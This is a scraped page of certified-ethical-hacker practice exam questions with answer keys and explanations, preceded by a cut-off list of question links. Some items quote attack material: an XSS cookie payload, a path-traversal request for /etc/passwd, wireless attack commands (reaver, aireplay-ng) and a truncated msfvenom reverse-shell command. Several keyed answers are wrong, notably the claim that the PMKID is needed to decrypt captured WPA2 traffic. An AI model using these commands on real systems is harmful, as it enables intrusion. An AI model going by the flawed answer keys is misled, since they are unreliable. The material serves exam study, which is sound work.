/dev/null`. What i…","url":"https://courseiva.com/questions/ec-council/ec-ceh/after-gaining-initial-access-to-a-linux-server-an-attacker-ucymq"},{"@type":"ListItem","position":99,"name":"Refer to the exhibit. A user visits a malicious site that returns this HTML. Which attack is being executed?","url":"https://courseiva.com/questions/ec-council/ec-ceh/refer-to-the-exhibit-a-user-visits-a-malicious-site-that-re-ex-65lt"},{"@type":"ListItem","position":100,"name":"A penetration tester executes the following command: 'reaver -i wlan0mon -b 00:11:22:33:44:55 -vv'. Which attack is bein…","url":"https://courseiva.com/questions/ec-council/ec-ceh/a-penetration-tester-executes-the-following-command-reaver-dl8qf"},{"@type":"ListItem","position":101,"name":"Which TWO of the following are common attack vectors against IoT devices? (Select 2)","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-two-of-the-following-are-common-attack-vectors-against-r9j85"},{"@type":"ListItem","position":102,"name":"During a penetration test, you run the following Nmap command: nmap -sS -sV -O -A -T4 --script=default 10.0.0.1. The sca…","url":"https://courseiva.com/questions/ec-council/ec-ceh/during-a-penetration-test-you-run-the-following-nmap-comman-wvb7g"},{"@type":"ListItem","position":103,"name":"Which of the following is a characteristic of a polymorphic virus?","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-of-the-following-is-a-characteristic-of-a-polymorphic-0jfxy"},{"@type":"ListItem","position":104,"name":"During the reconnaissance phase, a tester discovers that the target company's email server is configured to automaticall…","url":"https://courseiva.com/questions/ec-council/ec-ceh/during-the-reconnaissance-phase-a-tester-discovers-that-the-o6fhx"},{"@type":"ListItem","position":105,"name":"A security analyst runs a vulnerability scan with Nessus and receives a report indicating that multiple hosts have the '…","url":"https://courseiva.com/questions/ec-council/ec-ceh/a-security-analyst-runs-a-vulnerability-scan-with-nessus-and-53pdg"},{"@type":"ListItem","position":106,"name":"During a penetration test, a security analyst discovers that an organization's web application uses HTTP for login forms…","url":"https://courseiva.com/questions/ec-council/ec-ceh/during-a-penetration-test-a-security-analyst-discovers-that-ht0th"},{"@type":"ListItem","position":107,"name":"Which TWO of the following are passive reconnaissance techniques? (Select 2)","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-two-of-the-following-are-passive-reconnaissance-techni-7xjyt"},{"@type":"ListItem","position":108,"name":"Which TWO of the following are techniques used to escalate privileges on a Linux system?","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-two-of-the-following-are-techniques-used-to-escalate-p-ogz0p"},{"@type":"ListItem","position":109,"name":"Based on the exhibit, which service should be targeted first to gain initial access with the highest chance of success?","url":"https://courseiva.com/questions/ec-council/ec-ceh/based-on-the-exhibit-which-service-should-be-targeted-first-7t2b3"},{"@type":"ListItem","position":110,"name":"Which tool is specifically designed to enumerate SMB shares and user accounts on a Windows target by leveraging the SMB …","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-tool-is-specifically-designed-to-enumerate-smb-shares-1oa82"},{"@type":"ListItem","position":111,"name":"A security analyst observes the following in Apache access logs: 'GET /cgi-bin/test.cgi?cmd=id HTTP/1.1' 200. This is mo…","url":"https://courseiva.com/questions/ec-council/ec-ceh/a-security-analyst-observes-the-following-in-apache-access-l-yzn2z"},{"@type":"ListItem","position":112,"name":"Which TWO of the following Nmap scans are considered 'stealth' scans that do not complete a full TCP three-way handshake…","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-two-of-the-following-nmap-scans-are-considered-stealt-fm479"},{"@type":"ListItem","position":113,"name":"A security analyst wants to check if a web application is vulnerable to Server-Side Request Forgery (SSRF). Which of the…","url":"https://courseiva.com/questions/ec-council/ec-ceh/a-security-analyst-wants-to-check-if-a-web-application-is-vu-9gcdf"},{"@type":"ListItem","position":114,"name":"A penetration tester runs `snmpwalk -c public -v2c 192.168.1.50 1.3.6.1.2.1.1` and receives a list of system description…","url":"https://courseiva.com/questions/ec-council/ec-ceh/a-penetration-tester-runs-snmpwalk-c-public-v2c-192-168-1-iiasz"},{"@type":"ListItem","position":115,"name":"During a penetration test, you successfully gain access to a web server with a low-privileged shell. You want to escalat…","url":"https://courseiva.com/questions/ec-council/ec-ceh/during-a-penetration-test-you-successfully-gain-access-to-a-2564c"},{"@type":"ListItem","position":116,"name":"An analyst reviews the following HTTP response: HTTP/1.1 200 OK\r\nSet-Cookie: sessionid=abc123; SameSite=None; Secure\r\n..…","url":"https://courseiva.com/questions/ec-council/ec-ceh/an-analyst-reviews-the-following-http-response-http-1-1-200-c8xgy"},{"@type":"ListItem","position":117,"name":"Which TWO of the following Nmap flags are used for evasion of IDS/IPS? (Choose two.)","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-two-of-the-following-nmap-flags-are-used-for-evasion-o-ahfcm"},{"@type":"ListItem","position":118,"name":"Which TWO of the following are examples of application-layer DDoS attacks?","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-two-of-the-following-are-examples-of-application-layer-ukgyr"},{"@type":"ListItem","position":119,"name":"During a penetration test, you run the command `enum4linux -a 192.168.1.10` and receive output containing user account n…","url":"https://courseiva.com/questions/ec-council/ec-ceh/during-a-penetration-test-you-run-the-command-enum4linux-0wvn2"},{"@type":"ListItem","position":120,"name":"Which of the following is a cryptographic attack that exploits collisions in hash functions?","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-of-the-following-is-a-cryptographic-attack-that-exploi-h1twk"},{"@type":"ListItem","position":121,"name":"Which TWO of the following are valid SMTP enumeration commands that can be used to discover valid email addresses? (Sele…","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-two-of-the-following-are-valid-smtp-enumeration-comman-27jx1"},{"@type":"ListItem","position":122,"name":"An analyst executes 'nmap -sU -p 161,162 10.0.0.1'. What is the primary purpose of this scan?","url":"https://courseiva.com/questions/ec-council/ec-ceh/an-analyst-executes-nmap-su-p-161-162-10-0-0-1-what-is-vcclx"},{"@type":"ListItem","position":123,"name":"A security analyst runs `nbtstat -A 192.168.1.10` and receives a response with the computer name, logged-in user, and do…","url":"https://courseiva.com/questions/ec-council/ec-ceh/a-security-analyst-runs-nbtstat-a-192-168-1-10-and-receiv-1cycm"},{"@type":"ListItem","position":124,"name":"During a security assessment, a tester uses `nmap -sU 192.168.1.1`. What type of scan does this command perform?","url":"https://courseiva.com/questions/ec-council/ec-ceh/during-a-security-assessment-a-tester-uses-nmap-su-192-16-5eua6"},{"@type":"ListItem","position":125,"name":"A security analyst executes the command 'msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f ex…","url":"https://courseiva.com/questions/ec-council/ec-ceh/a-security-analyst-executes-the-command-msfvenom-p-windows-dv031"},{"@type":"ListItem","position":126,"name":"Which THREE of the following are indicators that a system has been compromised by a rootkit? (Select 3)","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-three-of-the-following-are-indicators-that-a-system-ha-enkuc"},{"@type":"ListItem","position":127,"name":"A security analyst notices that a web application's search functionality returns database error messages in the response…","url":"https://courseiva.com/questions/ec-council/ec-ceh/a-security-analyst-notices-that-a-web-application-s-search-f-dnwng"},{"@type":"ListItem","position":128,"name":"While analyzing web server logs, an analyst finds the following entry: GET /../../../../etc/passwd HTTP/1.1 with a 200 O…","url":"https://courseiva.com/questions/ec-council/ec-ceh/while-analyzing-web-server-logs-an-analyst-finds-the-follow-f5umg"},{"@type":"ListItem","position":129,"name":"An incident responder analyzes logs and finds repeated failed zone transfer attempts from an external IP. The zone trans…","url":"https://courseiva.com/questions/ec-council/ec-ceh/an-incident-responder-analyzes-logs-and-finds-repeated-faile-5dgc7"},{"@type":"ListItem","position":130,"name":"Which TWO of the following are effective mitigations against Cross-Site Request Forgery (CSRF)?","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-two-of-the-following-are-effective-mitigations-against-z933x"},{"@type":"ListItem","position":131,"name":"You are a security analyst for a medium-sized company. The company uses a custom web application for internal project ma…","url":"https://courseiva.com/questions/ec-council/ec-ceh/you-are-a-security-analyst-for-a-medium-sized-company-the-c-rkb9l"},{"@type":"ListItem","position":132,"name":"During a penetration test, a security analyst captures network traffic and observes a series of ARP replies without corr…","url":"https://courseiva.com/questions/ec-council/ec-ceh/during-a-penetration-test-a-security-analyst-captures-netwo-ly72y"},{"@type":"ListItem","position":133,"name":"Which THREE of the following are characteristics of asymmetric encryption?","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-three-of-the-following-are-characteristics-of-asymmetr-wg2sd"},{"@type":"ListItem","position":134,"name":"A penetration tester runs the following command against a Linux server: `smbclient -L //192.168.1.10 -N`. The output lis…","url":"https://courseiva.com/questions/ec-council/ec-ceh/a-penetration-tester-runs-the-following-command-against-a-li-c684k"},{"@type":"ListItem","position":135,"name":"A security analyst observes a sudden increase in network traffic from many external IPs targeting the company's web serv…","url":"https://courseiva.com/questions/ec-council/ec-ceh/a-security-analyst-observes-a-sudden-increase-in-network-tra-1b1zi"},{"@type":"ListItem","position":136,"name":"Refer to the exhibit. A penetration tester runs hashcat to crack NTLM hashes. Which hash mode (-m) would be correct for …","url":"https://courseiva.com/questions/ec-council/ec-ceh/refer-to-the-exhibit-a-penetration-tester-runs-hashcat-to-c-ex-lo55"},{"@type":"ListItem","position":137,"name":"During a penetration test, a tester captures a WPA2 4-way handshake. Which of the following is the NEXT step to attempt …","url":"https://courseiva.com/questions/ec-council/ec-ceh/during-a-penetration-test-a-tester-captures-a-wpa2-4-way-ha-mcrw9"},{"@type":"ListItem","position":138,"name":"A penetration tester uses the following Google dork: site:example.com filetype:pdf inurl:confidential. What is the MOST …","url":"https://courseiva.com/questions/ec-council/ec-ceh/a-penetration-tester-uses-the-following-google-dork-site-ex-4a1k9"},{"@type":"ListItem","position":139,"name":"A security analyst receives an alert about a workstation repeatedly sending large volumes of ICMP echo request packets t…","url":"https://courseiva.com/questions/ec-council/ec-ceh/a-security-analyst-receives-an-alert-about-a-workstation-rep-c4dyq"},{"@type":"ListItem","position":140,"name":"Which of the following Google dorks would an attacker MOST likely use to find login pages of web applications that are p…","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-of-the-following-google-dorks-would-an-attacker-most-l-p4d5i"},{"@type":"ListItem","position":141,"name":"During a penetration test, you gain access to a target system as a low-privileged user. Which of the following is the BE…","url":"https://courseiva.com/questions/ec-council/ec-ceh/during-a-penetration-test-you-gain-access-to-a-target-syste-v9q8n"},{"@type":"ListItem","position":142,"name":"Which of the following tools would be BEST to use for identifying all live hosts in a large IP range (e.g., 10.0.0.0/8) …","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-of-the-following-tools-would-be-best-to-use-for-identi-z03qp"},{"@type":"ListItem","position":143,"name":"During a penetration test, an ethical hacker runs the following command: aireplay-ng -0 5 -a 00:11:22:33:44:55 -c 66:77:…","url":"https://courseiva.com/questions/ec-council/ec-ceh/during-a-penetration-test-an-ethical-hacker-runs-the-follow-c6mq8"},{"@type":"ListItem","position":144,"name":"A security analyst suspects that an attacker is scanning their network. They notice a large number of TCP SYN packets be…","url":"https://courseiva.com/questions/ec-council/ec-ceh/a-security-analyst-suspects-that-an-attacker-is-scanning-the-nz7nc"},{"@type":"ListItem","position":145,"name":"A penetration tester calls an employee claiming to be from the IT help desk and asks for their password to perform a 'se…","url":"https://courseiva.com/questions/ec-council/ec-ceh/a-penetration-tester-calls-an-employee-claiming-to-be-from-t-sia0d"},{"@type":"ListItem","position":146,"name":"During a penetration test, the tester wants to discover all subdomains of a target domain using an OSINT technique. Whic…","url":"https://courseiva.com/questions/ec-council/ec-ceh/during-a-penetration-test-the-tester-wants-to-discover-all-rzigb"},{"@type":"ListItem","position":147,"name":"Which TWO of the following are types of malware that specifically aim to demand payment from victims?","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-two-of-the-following-are-types-of-malware-that-specifi-nsuju"},{"@type":"ListItem","position":148,"name":"During a penetration test, you discover an LDAP server on port 389 that allows anonymous binds. Which of the following e…","url":"https://courseiva.com/questions/ec-council/ec-ceh/during-a-penetration-test-you-discover-an-ldap-server-on-po-bfny3"},{"@type":"ListItem","position":149,"name":"Which of the following best describes the attack where an attacker uses a valid session token to impersonate a user with…","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-of-the-following-best-describes-the-attack-where-an-at-1k232"},{"@type":"ListItem","position":150,"name":"An IoT device uses the MQTT protocol without TLS. An attacker on the same network captures messages and publishes a fake…","url":"https://courseiva.com/questions/ec-council/ec-ceh/an-iot-device-uses-the-mqtt-protocol-without-tls-an-attacke-3maix"}]}
During a penetration test, a tester uses the following payload in a search field: <script>alert(document.cookie)</script>. The payload is reflected in the response without sanitization. However, the tester notices that the attack only works when the payload is submitted via a POST request, not GET. Which type of XSS is this?
A.Stored XSS
B.Reflected XSS
C.DOM-based XSS
D.Self-XSS
AnswerB
The payload is reflected immediately, making it reflected XSS.
Why this answer
Reflected XSS occurs when the payload is reflected immediately in the response. The fact that it works via POST but not GET does not change the classification; it is still reflected XSS because the payload is not stored on the server. Some reflected XSS may be triggered only via POST parameters.
An attacker sets up a fake access point with the same SSID as a legitimate corporate network. Clients connecting to this AP are prompted to enter their network credentials. Which type of attack is this?
A.Replay attack
B.Evil twin attack
C.WPS PIN attack
D.De-authentication attack
AnswerB
Evil twin replicates a legitimate SSID to trick users into connecting.
Why this answer
The attack is an evil twin attack, where a rogue AP mimics a legitimate one to capture credentials or perform man-in-the-middle.
A security analyst notices that a web server is responding very slowly to legitimate requests. The server logs show many incomplete HTTP GET requests that never complete, each opened slowly over time from many different IP addresses. Which attack is most likely occurring?
A.Ping of Death
B.HTTP flood
C.SYN flood
D.Slowloris
AnswerD
Slowloris sends slow partial HTTP headers to keep connections open.
Why this answer
Slowloris is an application-layer DDoS attack that holds connections open by sending partial HTTP requests, exhausting server connection pools. It uses many sources and slow sending.
An IoT device uses the MQTT protocol without TLS. A security tester connects to the broker and subscribes to all topics using '#'. What is the tester MOST likely able to accomplish?
A.Perform a denial of service on the broker
B.Eavesdrop on all MQTT communications
C.Inject malicious control commands
D.Replay previously captured messages
AnswerB
By subscribing to '#' (wildcard), the tester receives all messages published to the broker, enabling full eavesdropping.
Why this answer
MQTT without encryption allows anyone to subscribe to topics. Subscribing to '#' captures all messages, leading to interception of sensitive data. This is a passive eavesdropping attack, not active manipulation like replay or injection.
During a penetration test, an ethical hacker captures a WPA2 handshake and successfully cracks the PSK. Which additional action must be taken to decrypt previously captured traffic?
A.Compute the Pairwise Master Key Identifier (PMKID) from the PSK and AP MAC.
B.Capture the nonce values from the access point.
C.Use the PSK directly to compute the Michael Integrity Check (MIC).
D.Obtain the Group Temporal Key (GTK) from the access point.
AnswerA
The PMKID is used to derive the PTK, enabling decryption.
Why this answer
Option A is correct because after cracking the WPA2 Pre-Shared Key (PSK), the Pairwise Master Key (PMK) is derived from the PSK, SSID, and hashing iterations (PBKDF2). To decrypt previously captured traffic, you need the Pairwise Transient Key (PTK), which is computed from the PMK, the client nonce (SNonce), the AP nonce (ANonce), and both MAC addresses. However, the nonces are exchanged during the 4-way handshake and are present in the captured handshake; the missing piece is the PMKID, which is derived from the PMK, AP MAC, and STA MAC.
Computing the PMKID from the cracked PSK and AP MAC allows tools like aircrack-ng to verify the correct PMK and then derive the PTK to decrypt the traffic.
Exam trap
The trap here is that candidates often think the PSK alone is sufficient to decrypt traffic, but the PSK only gives the PMK; the PTK requires the nonces and MACs from the handshake, and the PMKID is the verification step that ensures the correct PMK is used for decryption.
How to eliminate wrong answers
Option B is wrong because the nonce values (ANonce and SNonce) are already captured as part of the WPA2 4-way handshake; capturing them again is unnecessary and does not enable decryption without the PMK. Option C is wrong because the Michael Integrity Check (MIC) is a field in the handshake messages used to verify integrity, not to derive encryption keys; using the PSK directly to compute the MIC is meaningless and does not yield the PTK needed for decryption. Option D is wrong because the Group Temporal Key (GTK) is used for broadcast/multicast traffic and is encrypted in the handshake using the PTK; obtaining the GTK from the AP is not possible without first having the PTK, and the GTK alone cannot decrypt unicast traffic.
During a penetration test of a corporate wireless network, you capture a WPA2 handshake and successfully recover the PSK. Later, you notice that some clients are using WPA3-Personal. Which attack could be used to downgrade a WPA3 client to WPA2 and capture its handshake?
A.Perform a PMKID attack on the WPA3 client to capture the handshake.
B.Use a WPS PIN brute-force attack against the WPA3 client.
C.Send deauthentication packets to the WPA3 client and capture the reconnection handshake.
D.Set up a rogue access point broadcasting a WPA2 network with the same SSID, forcing the client to reconnect using WPA2.
AnswerD
Rogue AP can entice client to downgrade.
Why this answer
Option D is correct because WPA3 clients are designed to fall back to WPA2 when the access point only supports WPA2. By setting up a rogue AP with the same SSID but configured for WPA2, the client will attempt to connect using WPA2, allowing you to capture the 4-way handshake and potentially recover the PSK if the same password is used for both security modes.
Exam trap
EC-Council often tests the misconception that deauthentication alone can force a protocol downgrade, but in WPA3, deauthentication only triggers a reconnection using the same security protocol unless the AP changes its capabilities.
How to eliminate wrong answers
Option A is wrong because a PMKID attack targets WPA2/3 access points that expose the PMKID in the first EAPOL frame, but it does not downgrade a WPA3 client; it is used to recover the PSK without a full handshake, not to capture a handshake from a downgraded client. Option B is wrong because WPS PIN brute-force attacks target WPS-enabled access points, not clients, and WPA3-Personal does not use WPS; this attack is irrelevant for downgrading a WPA3 client. Option C is wrong because sending deauthentication packets to a WPA3 client will only cause it to reconnect using WPA3 (if the AP supports it), not downgrade to WPA2; the client will re-authenticate with its current security protocol, not fall back automatically.
A security analyst notices that a server is sending an unusually high number of SYN packets to multiple external hosts, but the connections are never completed. The server is most likely involved in which type of attack?
A.Ping of Death
B.Smurf attack
C.UDP flood
D.SYN flood
AnswerD
Correct. A SYN flood sends many SYN packets with no final ACK, overwhelming the target.
Why this answer
A SYN flood sends many SYN packets without completing the handshake, exhausting target resources. The attacker's server is the source, indicating it is being used to launch the attack.
After a security incident, an analyst retrieves a suspicious file. The analyst runs the 'strings' command on it and sees references to 'CreateRemoteThread' and 'WriteProcessMemory'. Which technique does this indicate?
A.DLL hijacking
B.Privilege escalation
C.Process injection
D.Buffer overflow
AnswerC
CreateRemoteThread and WriteProcessMemory are used to inject code into a remote process.
Why this answer
These Windows API functions are commonly used for process injection, where code is written into another process's memory and executed. This is a common malware technique to evade detection.
Which type of password cracking attack uses a precomputed table of hash chains to reverse hashes quickly?
A.Rainbow table attack
B.Dictionary attack
C.Brute-force attack
D.Hybrid attack
AnswerA
Why this answer
Rainbow tables are precomputed hash chains that allow fast reversal of hashes. They are stored in files and used by tools like RainbowCrack and Ophcrack.
A web application is vulnerable to SQL injection. Which THREE of the following techniques can be used to extract data from the database using blind SQL injection?
Select 3 answers
A.Time-based
B.Error-based
C.Boolean-based
D.Out-of-band
E.Union-based
AnswersA, C, D
Time-based uses delays to infer true/false conditions.
Why this answer
Boolean-based, time-based, and out-of-band are all types of blind SQL injection. Error-based and union-based are in-band techniques, not blind.
A security analyst reviews the iptables firewall configuration on a Linux server acting as a gateway for a small office. The server has two interfaces: eth0 (external) and eth1 (internal, 192.168.1.0/24). Based on the exhibit, which of the following is a valid security concern?
A.All traffic to the loopback interface is accepted, which could allow local attacks to bypass firewall rules.
B.The OUTPUT chain policy is set to ACCEPT, which allows any outbound traffic.
C.The FORWARD chain only allows traffic from 192.168.1.0/24 to any destination, which is too permissive.
D.UDP port 53 is allowed, which could permit DNS tunneling attacks.
AnswerA
Loopback acceptance can be exploited if local services are vulnerable.
Why this answer
Option A is correct because the iptables rules show that all traffic to the loopback interface (lo) is accepted in the INPUT chain. This means any process on the local host can send packets to 127.0.0.1 without being filtered, potentially allowing local privilege escalation or local attacks to bypass firewall restrictions. In a gateway configuration, this can be exploited if an attacker gains local access and uses the loopback to communicate with services that should be protected.
Exam trap
The trap here is that candidates often overlook the loopback interface rules and focus on external-facing chains, assuming that only external interfaces matter for security, while the question specifically tests awareness of local attack vectors through the loopback interface.
How to eliminate wrong answers
Option B is wrong because the OUTPUT chain policy being set to ACCEPT is not inherently a security concern; it is a common default that allows the gateway itself to initiate outbound connections, which is expected for normal operation. Option C is wrong because the FORWARD chain rule only allowing traffic from 192.168.1.0/24 to any destination is a typical and correct configuration for a gateway that forwards internal traffic to the internet; it is not 'too permissive' as it restricts forwarding to the internal subnet only. Option D is wrong because allowing UDP port 53 (DNS) is necessary for name resolution and does not inherently permit DNS tunneling; tunneling requires additional exploitation and is not a direct consequence of allowing standard DNS traffic.
Which THREE of the following are techniques used in session hijacking? (Select three.)
Select 3 answers
A.ARP poisoning
B.DNS amplification
C.TCP sequence prediction
D.Cookie theft
E.MAC flooding
AnswersA, C, D
Correct. ARP poisoning enables MITM, which can be used to hijack sessions.
Why this answer
TCP sequence prediction allows an attacker to guess sequence numbers and inject packets. Cookie theft (e.g., via XSS) steals session tokens. ARP poisoning enables MITM to intercept and hijack sessions.
A penetration tester wants to perform a stealthy TCP scan that does not complete the three-way handshake. Which Nmap flag should be used?
A.-sU
B.-sS
C.-sV
D.-sT
AnswerB
-sS is the SYN stealth scan that doesn't complete the handshake.
Why this answer
Option B (-sS) is correct because it performs a SYN scan, which sends a TCP SYN packet and waits for a SYN-ACK response without completing the three-way handshake (i.e., it sends a RST instead of an ACK). This makes the scan stealthy as it avoids establishing a full TCP connection, reducing the chance of being logged by the target.
Exam trap
The trap here is that candidates often confuse -sS (SYN scan) with -sT (TCP connect scan), mistakenly thinking that -sT is stealthy because it uses TCP, but -sT actually completes the full handshake and is easily logged, while -sS is the true stealthy option.
How to eliminate wrong answers
Option A (-sU) is wrong because it performs a UDP scan, not a TCP scan, and UDP is connectionless, so it does not involve a three-way handshake at all. Option C (-sV) is wrong because it is used for version detection, which requires completing the three-way handshake to probe services, not for stealthy scanning. Option D (-sT) is wrong because it performs a full TCP connect scan, which completes the three-way handshake and is not stealthy, as it is more likely to be logged by the target system.
A security analyst wants to perform passive reconnaissance on a target domain. Which TWO of the following methods are considered passive? (Choose 2)
Select 2 answers
A.WHOIS lookup
B.Shodan search
C.Telnet banner grab
D.Ping sweep
E.Nmap SYN scan
AnswersA, B
Queries public WHOIS databases without contacting the target.
Why this answer
WHOIS lookup is passive because it queries public registration databases (e.g., ARIN, RIPE) via the WHOIS protocol (RFC 3912) to retrieve domain ownership, registrar, and name server information without sending any packets to the target's own infrastructure. This data is publicly available and does not interact with the target's servers or network, making it a classic passive reconnaissance technique.
Exam trap
EC-Council often tests the distinction between passive and active reconnaissance by including tools like Shodan (which is passive) alongside active scanning tools like Nmap, leading candidates to mistakenly classify Shodan as active because it involves a search engine rather than direct network interaction.
Which of the following best describes the difference between active and passive reconnaissance?
A.Active reconnaissance is legal, while passive reconnaissance is not
B.Active reconnaissance involves direct interaction with the target, whereas passive reconnaissance does not
C.Passive reconnaissance uses tools like Nmap, while active reconnaissance uses Google dorks
D.Passive reconnaissance is used only during the exploitation phase
AnswerB
This is the core difference between the two approaches.
Why this answer
Active reconnaissance involves direct interaction with the target system, such as sending packets, probes, or connection requests (e.g., using Nmap scans, ping sweeps, or banner grabbing) that can be logged or detected by the target. Passive reconnaissance, in contrast, gathers information without engaging the target directly, relying on publicly available sources (e.g., WHOIS lookups, DNS records, social media, or search engines) and does not generate traffic that reaches the target's network. This distinction is fundamental in the CEH methodology because active techniques carry a higher risk of alerting the target, while passive techniques are stealthier and often used first to avoid detection.
Exam trap
EC-Council often tests the misconception that passive reconnaissance is 'safer' or 'always legal,' but the trap here is confusing the method of interaction (direct vs. indirect) with legality or tool assignment, leading candidates to pick Option A or C instead of the correct definition based on target interaction.
How to eliminate wrong answers
Option A is wrong because legality is not the defining difference; both active and passive reconnaissance can be legal or illegal depending on authorization and jurisdiction—active reconnaissance is not inherently legal, and passive reconnaissance is not inherently illegal. Option C is wrong because it reverses the typical tool usage: Nmap is a primary tool for active reconnaissance (sending packets to discover hosts and services), while Google dorks are a form of passive reconnaissance (searching publicly indexed data without direct interaction). Option D is wrong because passive reconnaissance is primarily used during the footprinting and reconnaissance phase, not the exploitation phase; exploitation occurs after reconnaissance and scanning are complete.
Which of the following tools is specifically designed for ARP poisoning and can be used to perform man-in-the-middle attacks on a local network?
A.Nmap
B.Wireshark
C.Metasploit
D.Ettercap
AnswerD
Ettercap supports ARP poisoning, DNS spoofing, and other MITM techniques.
Why this answer
Ettercap is a comprehensive suite for man-in-the-middle attacks on LAN, featuring ARP poisoning capabilities. Wireshark is a packet analyzer, Nmap is a network scanner, and Metasploit is an exploitation framework.
A penetration tester is scanning a target and receives the output: 'PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 443/tcp open https'. Which Nmap flag was MOST likely used to obtain this output?
A.-sS
B.-O
C.-A
D.-sV
AnswerA
-sS performs a SYN scan and displays open ports with service names.
Why this answer
The output shows open ports with their service names (ssh, http, https) but no version information. The -sS flag performs a SYN stealth scan, which by default probes common ports and uses the /etc/services file to map port numbers to service names. This matches the output format exactly, as -sS does not perform version detection or OS fingerprinting.
Exam trap
The trap here is that candidates often confuse the service name mapping (from -sS or default scan) with version detection (-sV), assuming that seeing 'ssh' or 'http' implies version probing occurred, when in fact Nmap simply maps the port number to a common service name from its database.
How to eliminate wrong answers
Option B is wrong because -O is used for OS detection, which would add OS fingerprinting details (e.g., 'OS: Linux 2.6.32') to the output, not just port states and service names. Option C is wrong because -A enables aggressive scanning (OS detection, version detection, script scanning, traceroute), which would produce far more verbose output including version strings and script results. Option D is wrong because -sV enables version detection, which would append version information (e.g., 'Apache httpd 2.4.41') to each service line, not just the service name from the port mapping.
Which of the following Burp Suite tools is used to automatically fuzz web application inputs and identify common vulnerabilities like SQL injection and XSS?
A.Proxy
B.Repeater
C.Intruder
D.Scanner
AnswerC
Intruder allows automated fuzzing with payloads.
Why this answer
Burp Intruder is a tool for automating customized attacks against web applications, including fuzzing for vulnerabilities.
After gaining initial access to a Linux server, an attacker runs `find / -perm -4000 -o -perm -2000 2>/dev/null`. What is the primary objective of this command?
A.Locate world-writable files for data exfiltration
B.List all files owned by the root user
C.Find configuration files containing passwords
D.Identify files with SUID or GUID bits set for privilege escalation
AnswerD
SUID/GUID binaries run with elevated privileges.
Why this answer
The -perm -4000 finds SUID files, -perm -2000 finds GUID files. These are often exploited for privilege escalation.
A penetration tester executes the following command: 'reaver -i wlan0mon -b 00:11:22:33:44:55 -vv'. Which attack is being performed?
A.WEP IV attack
B.Evil twin attack
C.De-authentication attack
D.WPS PIN brute-force attack
AnswerD
Reaver performs brute-force attacks against the WPS PIN to recover the PSK.
Why this answer
Reaver is a tool used for brute-forcing WPS PINs to recover the WPA/WPA2 pre-shared key. The command specifies the interface and BSSID, indicating a WPS attack.
Which TWO of the following are common attack vectors against IoT devices? (Select 2)
Select 2 answers
A.Default credentials
B.Firmware extraction via JTAG
C.Insecure protocols like MQTT without encryption
D.Replay attacks on encrypted sessions
E.SQL injection
AnswersA, C
Many IoT devices ship with default usernames/passwords that remain unchanged.
Why this answer
Default credentials and insecure protocols (e.g., MQTT without TLS) are common IoT attack vectors; firmware extraction is a technique, not a vector; SQL injection is more common in web apps; replay attacks can occur but are not specific to IoT.
During a penetration test, you run the following Nmap command: nmap -sS -sV -O -A -T4 --script=default 10.0.0.1. The scan results show that port 443 is open and the service is 'Apache httpd 2.4.29'. However, banner grabbing with Netcat shows 'Apache/2.4.41 (Ubuntu)'. What is the MOST likely explanation for the discrepancy?
A.The server is using a reverse proxy that presents a different version to Nmap
B.Netcat banner grabbing is more reliable because it reads the actual server response
C.The discrepancy is due to Nmap's OS fingerprinting conflicting with version detection
D.Nmap is more accurate because it uses deep packet inspection
AnswerB
Netcat establishes a TCP connection and reads the service banner directly, while Nmap's -sV uses a database of signatures that may be incomplete or outdated.
Why this answer
Option B is correct because Netcat performs a direct TCP connection to the service and reads the raw banner as sent by the application, which is the most immediate and unfiltered version information. Nmap's version detection (-sV) relies on probe-response matching against its signature database, which can be outdated or misinterpret the service if the server uses banner obfuscation or if the Nmap database does not have an exact match for the newer version. In this case, Netcat reveals the actual server version (2.4.41), while Nmap's database may only have a signature for 2.4.29, leading to a false lower version.
Exam trap
The trap here is that candidates assume Nmap is always more accurate because it is a sophisticated scanning tool, but in version detection, a direct banner grab with Netcat is often more reliable when the service banner is not suppressed.
How to eliminate wrong answers
Option A is wrong because a reverse proxy would typically present the same version to both Nmap and Netcat, or could mask the backend version entirely; it would not cause Nmap to report a lower version than the actual banner. Option C is wrong because OS fingerprinting (-O) is a separate function that does not interfere with version detection; the discrepancy is between two version detection methods, not OS fingerprinting. Option D is wrong because Nmap's version detection does not use deep packet inspection; it sends specific probes and matches responses to a signature database, which can be less accurate than a direct banner grab if the database is outdated or the service responds differently to probes.
During the reconnaissance phase, a tester discovers that the target company's email server is configured to automatically respond to delivery status notifications (DSNs). Which type of attack could this information facilitate?
A.DNS cache poisoning
B.Email enumeration
C.Man-in-the-middle attack
D.Phishing attack
AnswerB
DSN responses can confirm valid addresses.
Why this answer
Email servers that automatically respond to Delivery Status Notifications (DSNs) as defined in RFC 1891/3464 can be exploited for email enumeration. By sending a message to a non-existent address, the DSN response will indicate the address is invalid, while a valid address may generate no DSN or a different response. This allows an attacker to systematically verify valid email addresses on the target domain without triggering a full bounce-back to the original sender.
Exam trap
EC-Council often tests the distinction between passive reconnaissance (like email enumeration via DSN) and active attacks (like MITM or phishing), so candidates mistakenly choose 'Phishing attack' because they associate email servers with phishing, but the question specifically asks what the DSN behavior facilitates during reconnaissance.
How to eliminate wrong answers
Option A is wrong because DNS cache poisoning targets the DNS resolver's cache with forged records, not email server DSN behavior. Option C is wrong because a man-in-the-middle attack requires intercepting and relaying communications between two parties, which is unrelated to DSN responses. Option D is wrong because phishing is a social engineering attack that uses deceptive messages to steal credentials, not a reconnaissance technique to enumerate valid email addresses.
A security analyst runs a vulnerability scan with Nessus and receives a report indicating that multiple hosts have the 'MS17-010' vulnerability. What is the MOST likely impact of this vulnerability if exploited?
A.Remote code execution on Windows systems
B.SQL injection
